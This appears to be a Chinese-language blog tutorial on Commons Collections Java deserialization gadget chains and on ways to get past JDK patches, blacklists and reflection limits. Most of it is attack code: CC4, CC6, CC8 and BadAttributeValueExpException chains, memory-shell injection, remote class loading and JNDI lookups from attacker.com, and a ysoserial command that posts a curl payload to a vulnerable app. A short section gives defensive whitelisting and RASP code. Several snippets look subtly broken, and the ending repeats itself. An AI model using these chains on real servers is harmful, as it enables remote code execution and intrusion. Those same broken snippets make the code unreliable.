Java反序列化链CommonsCollections绕过技巧详解<\/h1>

一、JDK高版本绕过(针对8u71+的修复)<\/h2>

CC6链构造技巧<\/h3>
\/\/ 使用TiedMapEntry替代AnnotationInvocationHandler
<\/span><\/span><\/span><\/span>Transformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc.exe"<\/span>})<\/span>
<\/span><\/span>});<\/span>
<\/span><\/span>
<\/span><\/span>Map lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>new<\/span> HashMap(),<\/span> chain);<\/span>
<\/span><\/span>TiedMapEntry entry =<\/span> new<\/span> TiedMapEntry(<\/span>lazyMap,<\/span> "foo"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 通过反射触发
<\/span><\/span><\/span><\/span>HashSet hashSet =<\/span> new<\/span> HashSet(<\/span>1<\/span>);<\/span>
<\/span><\/span>hashSet.<\/span>add<\/span>(<\/span>"bar"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反射修改HashSet内部结构
<\/span><\/span><\/span><\/span>Field tableField =<\/span> HashSet.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"map"<\/span>);<\/span>
<\/span><\/span>tableField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>HashMap internalMap =<\/span> (<\/span>HashMap)<\/span> tableField.<\/span>get<\/span>(<\/span>hashSet);<\/span>
<\/span><\/span>
<\/span><\/span>Field entryField =<\/span> HashMap.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"table"<\/span>);<\/span>
<\/span><\/span>entryField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Object[]<\/span> table =<\/span> (<\/span>Object[])<\/span> entryField.<\/span>get<\/span>(<\/span>internalMap);<\/span>
<\/span><\/span>
<\/span><\/span>Object node =<\/span> table[<\/span>0<\/span>];<\/span>
<\/span><\/span>Field keyField =<\/span> node.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"key"<\/span>);<\/span>
<\/span><\/span>keyField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>keyField.<\/span>set<\/span>(<\/span>node,<\/span> entry);<\/span> \/\/ 将恶意对象注入HashSet
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 序列化触发
<\/span><\/span><\/span><\/span>serialize(<\/span>hashSet);<\/span>
<\/span><\/span><\/code><\/pre>绕过原理<\/strong>:<\/p>

利用TiedMapEntry.getValue()自动调用LazyMap.get()的特性<\/li>
通过修改HashSet内部存储结构绕过AnnotationInvocationHandler限制<\/li>
<\/ul>
二、黑名单过滤绕过<\/h2>
1. 非常规Transformer组合<\/h3>
\/\/ 使用Commons Collections的其它类构造链
<\/span><\/span><\/span><\/span>Transformer[]<\/span> chain =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>javax.<\/span>script<\/span>.<\/span>ScriptEngineManager<\/span>.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newInstance"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getEngineByName"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"JavaScript"<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"eval"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"java.lang.Runtime.getRuntime().exec('calc')"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>2. 结合XStream别名绕过<\/h3>
<!-- 利用XStream的别名机制隐藏类名 --><\/span>
<\/span><\/span><xstream><\/span>
<\/span><\/span>    <alias<\/span> name=<\/span>"harmless"<\/span> type=<\/span>"org.apache.commons.collections.functors.InvokerTransformer"<\/span>\/><\/span>
<\/span><\/span><\/xstream><\/span>
<\/span><\/span>
<\/span><\/span><!-- 实际攻击载荷 --><\/span>
<\/span><\/span><harmless><\/span>
<\/span><\/span>    <iMethodName><\/span>exec<\/iMethodName><\/span>
<\/span><\/span>    <iParamTypes><\/span>
<\/span><\/span>        <class><\/span>java.lang.String<\/class><\/span>
<\/span><\/span>    <\/iParamTypes><\/span>
<\/span><\/span>    <iArgs><\/span>
<\/span><\/span>        <string><\/span>calc<\/string><\/span>
<\/span><\/span>    <\/iArgs><\/span>
<\/span><\/span><\/harmless><\/span>
<\/span><\/span><\/code><\/pre>三、无文件落地攻击<\/h2>
1. 内存马注入(Tomcat Filter型)<\/h3>
Transformer[]<\/span> memShellChain =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>()),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"loadClass"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"javax.servlet.Filter"<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"addFilter"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Filter.<\/span>class<\/span>}}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[]{<\/span>"evilFilter"<\/span>,<\/span> new<\/span> MaliciousFilter()}})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>2. JNDI远程类加载<\/h3>
\/\/ 结合Log4j2漏洞的混合利用
<\/span><\/span><\/span><\/span>Transformer[]<\/span> jndiChain =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>JndiLookup.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"lookup"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"ldap:\/\/attacker.com\/Exploit"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>四、字节码注入绕过<\/h2>
1. 使用TemplatesImpl加载BCEL字节码<\/h3>
\/\/ 生成恶意字节码
<\/span><\/span><\/span><\/span>String bcelCode =<\/span> "
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>BCEL
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>..."<\/span>;<\/span>
<\/span><\/span>byte<\/span>[]<\/span> bytecode =<\/span> com.<\/span>sun<\/span>.<\/span>org<\/span>.<\/span>apache<\/span>.<\/span>bcel<\/span>.<\/span>internal<\/span>.<\/span>classfile<\/span>.<\/span>Utility<\/span>.<\/span>decode<\/span>(<\/span>bcelCode,<\/span> true<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造TemplatesImpl链
<\/span><\/span><\/span><\/span>TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>setField(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>bytecode});<\/span>
<\/span><\/span>setField(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "Exploit"<\/span>);<\/span>
<\/span><\/span>setField(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>Transformer[]<\/span> bcChain =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>templates),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newTransformer"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>)<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>2. Groovy链利用<\/h3>
\/\/ 利用Groovy的MethodClosure
<\/span><\/span><\/span><\/span>Class methodClosure =<\/span> Class.<\/span>forName<\/span>(<\/span>"groovy.lang.Closure"<\/span>);<\/span>
<\/span><\/span>Object closure =<\/span> methodClosure.<\/span>getConstructor<\/span>(<\/span>Object.<\/span>class<\/span>,<\/span> Object.<\/span>class<\/span>)<\/span>
<\/span><\/span>    .<\/span>newInstance<\/span>(<\/span>new<\/span> MethodClosure(<\/span>"calc"<\/span>,<\/span> "execute"<\/span>),<\/span> "execute"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>Transformer[]<\/span> groovyChain =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>closure),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"call"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>)<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>五、防御对抗技巧<\/h2>
1. 反射黑名单绕过<\/h3>
\/\/ 使用Unsafe类绕过反射限制
<\/span><\/span><\/span><\/span>Field theUnsafe =<\/span> Unsafe.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"theUnsafe"<\/span>);<\/span>
<\/span><\/span>theUnsafe.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Unsafe unsafe =<\/span> (<\/span>Unsafe)<\/span> theUnsafe.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 直接内存操作修改访问权限
<\/span><\/span><\/span><\/span>Class cls =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.lang.reflect.AccessibleObject"<\/span>);<\/span>
<\/span><\/span>Field overrideField =<\/span> cls.<\/span>getDeclaredField<\/span>(<\/span>"override"<\/span>);<\/span>
<\/span><\/span>long<\/span> offset =<\/span> unsafe.<\/span>objectFieldOffset<\/span>(<\/span>overrideField);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 强制修改字段值
<\/span><\/span><\/span><\/span>unsafe.<\/span>putBoolean<\/span>(<\/span>chain,<\/span> offset,<\/span> true<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>2. 动态类加载绕过<\/h3>
\/\/ 使用URLClassLoader加载远程类
<\/span><\/span><\/span><\/span>Transformer[]<\/span> urlChain =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>URLClassLoader.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newInstance"<\/span>,<\/span> new<\/span> Class[]{<\/span>URL[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>new<\/span> URL[]{<\/span>new<\/span> URL(<\/span>"http:\/\/attacker.com\/"<\/span>)}}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"loadClass"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"Exploit"<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newInstance"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>)<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>六、检测与防御方案<\/h2>
1. 防御性代码示例<\/h3>
\/\/ 安全反序列化实现
<\/span><\/span><\/span><\/span>public<\/span> class<\/span> SafeObjectInputStream<\/span> extends<\/span> ObjectInputStream {<\/span>
<\/span><\/span>    private<\/span> static<\/span> final<\/span> Set<<\/span>String><\/span> allowedClasses =<\/span> Set.<\/span>of<\/span>(<\/span>"java.lang.String"<\/span>,<\/span> "java.util.HashMap"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>    public<\/span> SafeObjectInputStream<\/span>(<\/span>InputStream in)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        super<\/span>(<\/span>in);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    protected<\/span> Class<?><\/span> resolveClass(<\/span>ObjectStreamClass desc)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        if<\/span> (!<\/span>allowedClasses.<\/span>contains<\/span>(<\/span>desc.<\/span>getName<\/span>()))<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> InvalidClassException(<\/span>"Unauthorized class: "<\/span>,<\/span> desc.<\/span>getName<\/span>());<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> super<\/span>.<\/span>resolveClass<\/span>(<\/span>desc);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. 运行时防护(RASP)<\/h3>
\/\/ 使用Java Agent监控危险方法
<\/span><\/span><\/span><\/span>public<\/span> static<\/span> class<\/span> SecurityAgent<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> premain<\/span>(<\/span>String args,<\/span> Instrumentation inst)<\/span> {<\/span>
<\/span><\/span>        inst.<\/span>addTransformer<\/span>((<\/span>loader,<\/span> className,<\/span> classBeingRedefined,<\/span> protectionDomain,<\/span> classfileBuffer)<\/span> -><\/span> {<\/span>
<\/span><\/span>            if<\/span> (<\/span>className.<\/span>equals<\/span>(<\/span>"java\/io\/ObjectInputStream"<\/span>))<\/span> {<\/span>
<\/span><\/span>                ClassReader cr =<\/span> new<\/span> ClassReader(<\/span>classfileBuffer);<\/span>
<\/span><\/span>                ClassWriter cw =<\/span> new<\/span> ClassWriter(<\/span>cr,<\/span> ClassWriter.<\/span>COMPUTE_FRAMES<\/span>);<\/span>
<\/span><\/span>                cr.<\/span>accept<\/span>(<\/span>new<\/span> ObjectInputStreamVisitor(<\/span>cw),<\/span> 0<\/span>);<\/span>
<\/span><\/span>                return<\/span> cw.<\/span>toByteArray<\/span>();<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            return<\/span> classfileBuffer;<\/span>
<\/span><\/span>        });<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ ASM字节码插桩
<\/span><\/span><\/span><\/span>class<\/span> ObjectInputStreamVisitor<\/span> extends<\/span> ClassVisitor {<\/span>
<\/span><\/span>    public<\/span> MethodVisitor visitMethod<\/span>(<\/span>int<\/span> access,<\/span> String name,<\/span> String desc,<\/span> String signature,<\/span> String[]<\/span> exceptions)<\/span> {<\/span>
<\/span><\/span>        MethodVisitor mv =<\/span> super<\/span>.<\/span>visitMethod<\/span>(<\/span>access,<\/span> name,<\/span> desc,<\/span> signature,<\/span> exceptions);<\/span>
<\/span><\/span>        if<\/span> (<\/span>name.<\/span>equals<\/span>(<\/span>"readObject"<\/span>))<\/span> {<\/span>
<\/span><\/span>            mv.<\/span>visitCode<\/span>();<\/span>
<\/span><\/span>            mv.<\/span>visitMethodInsn<\/span>(<\/span>INVOKESTATIC,<\/span> "SecurityCheck"<\/span>,<\/span> "validateDeserialization"<\/span>);<\/span>
<\/span><\/span>            mv.<\/span>visitEnd<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> mv;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>七、进阶绕过技巧<\/h2>
1. CC4链:利用PriorityQueue与TransformingComparator<\/h3>
\/\/ 构造TemplatesImpl恶意类
<\/span><\/span><\/span><\/span>TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "Exploit"<\/span>);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> code =<\/span> loadEvilClassBytes();<\/span> \/\/ 加载恶意字节码
<\/span><\/span><\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>code});<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构建InstantiateTransformer触发newTransformer()
<\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>TrAXFilter.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InstantiateTransformer(<\/span>
<\/span><\/span>        new<\/span> Class[]{<\/span>Templates.<\/span>class<\/span>},<\/span>
<\/span><\/span>        new<\/span> Object[]{<\/span>templates}<\/span>
<\/span><\/span>    )<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 配置TransformingComparator
<\/span><\/span><\/span><\/span>TransformingComparator comparator =<\/span> new<\/span> TransformingComparator<>(<\/span>new<\/span> ConstantTransformer(<\/span>1<\/span>));<\/span>
<\/span><\/span>PriorityQueue queue =<\/span> new<\/span> PriorityQueue<>(<\/span>2<\/span>,<\/span> comparator);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>1<\/span>);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>2<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反射注入真实Transformer链
<\/span><\/span><\/span><\/span>setFieldValue(<\/span>comparator,<\/span> "transformer"<\/span>,<\/span> chain);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化与反序列化触发
<\/span><\/span><\/span><\/span>serialize(<\/span>queue);<\/span>
<\/span><\/span>deserialize(<\/span>"payload.bin"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>2. BadAttributeValueExpException链<\/h3>
\/\/ 构造Transformer链
<\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 配置LazyMap与TiedMapEntry
<\/span><\/span><\/span><\/span>Map lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>new<\/span> HashMap(),<\/span> chain);<\/span>
<\/span><\/span>TiedMapEntry entry =<\/span> new<\/span> TiedMapEntry(<\/span>lazyMap,<\/span> "trigger_key"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 通过反射设置BadAttributeValueExpException的val属性
<\/span><\/span><\/span><\/span>BadAttributeValueExpException exp =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>Field valField =<\/span> exp.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span>
<\/span><\/span>valField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>valField.<\/span>set<\/span>(<\/span>exp,<\/span> entry);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化触发
<\/span><\/span><\/span><\/span>serialize(<\/span>exp);<\/span>
<\/span><\/span><\/code><\/pre>3. CC8链:TreeBag与TreeMap组合触发<\/h3>
\/\/ 配置TemplatesImpl恶意类
<\/span><\/span><\/span><\/span>TemplatesImpl templates =<\/span> createEvilTemplates();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构建Transformer链
<\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>templates),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newTransformer"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>)<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 配置TransformingComparator
<\/span><\/span><\/span><\/span>TransformingComparator comparator =<\/span> new<\/span> TransformingComparator<>(<\/span>chain);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造TreeBag触发链
<\/span><\/span><\/span><\/span>TreeBag bag =<\/span> new<\/span> TreeBag(<\/span>comparator);<\/span>
<\/span><\/span>bag.<\/span>add<\/span>(<\/span>"dummy"<\/span>);<\/span> \/\/ 触发TreeMap.put()
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 序列化与反序列化
<\/span><\/span><\/span><\/span>serialize(<\/span>bag);<\/span>
<\/span><\/span>deserialize(<\/span>"payload.bin"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>八、攻击验证与防御策略<\/h2>
攻击验证命令<\/h3>
# 使用ysoserial生成绕过payload<\/span>
<\/span><\/span>java -Djdk.xml.enableTemplatesImplDeserialization=<\/span>true \
<\/span><\/span><\/span><\/span>     -jar ysoserial.jar CommonsCollections6 "curl http:\/\/attacker.com"<\/span> > payload.bin
<\/span><\/span>
<\/span><\/span># 发送到测试服务<\/span>
<\/span><\/span>curl -X POST --data-binary @payload.bin http:\/\/vulnerable-app\/deserialize
<\/span><\/span><\/code><\/pre>审计关注点<\/h3>
\/\/ 危险代码模式
<\/span><\/span><\/span><\/span>ObjectInputStream.<\/span>readObject<\/span>()<\/span>
<\/span><\/span>XMLDecoder.<\/span>readObject<\/span>()<\/span>
<\/span><\/span>JSON.<\/span>parseObject<\/span>(<\/span>input,<\/span> Feature.<\/span>SupportNonPublicField<\/span>)<\/span>
<\/span><\/span>RMI Registry.<\/span>bind<\/span>()<\/span> \/\/ 远程对象绑定
<\/span><\/span><\/span><\/code><\/pre>防御策略<\/h3>

升级Commons Collections到4.4+版本<\/li>
使用SerialKiller等安全反序列化库<\/li>
启用SecurityManager沙箱<\/li>
部署RASP进行运行时保护<\/li>
结合SAST(静态分析)、IAST(交互式检测)实现立体防御<\/li>
<\/ol>
Java反序列化链CommonsCollections绕过技巧详解<\/h1>

一、JDK高版本绕过(针对8u71+的修复)<\/h2>

二、黑名单过滤绕过<\/h2>

三、无文件落地攻击<\/h2>

四、字节码注入绕过<\/h2>

五、防御对抗技巧<\/h2>

六、检测与防御方案<\/h2>

七、进阶绕过技巧<\/h2>

八、攻击验证与防御策略<\/h2>

防御策略<\/h3> 升级Commons Collections到4.4+版本<\/li> 使用SerialKiller等安全反序列化库<\/li> 启用SecurityManager沙箱<\/li> 部署RASP进行运行时保护<\/li> 结合SAST(静态分析)、IAST(交互式检测)实现立体防御<\/li> <\/ol>

防御策略<\/h3>

升级Commons Collections到4.4+版本<\/li>
使用SerialKiller等安全反序列化库<\/li>
启用SecurityManager沙箱<\/li>
部署RASP进行运行时保护<\/li>
结合SAST(静态分析)、IAST(交互式检测)实现立体防御<\/li> <\/ol>
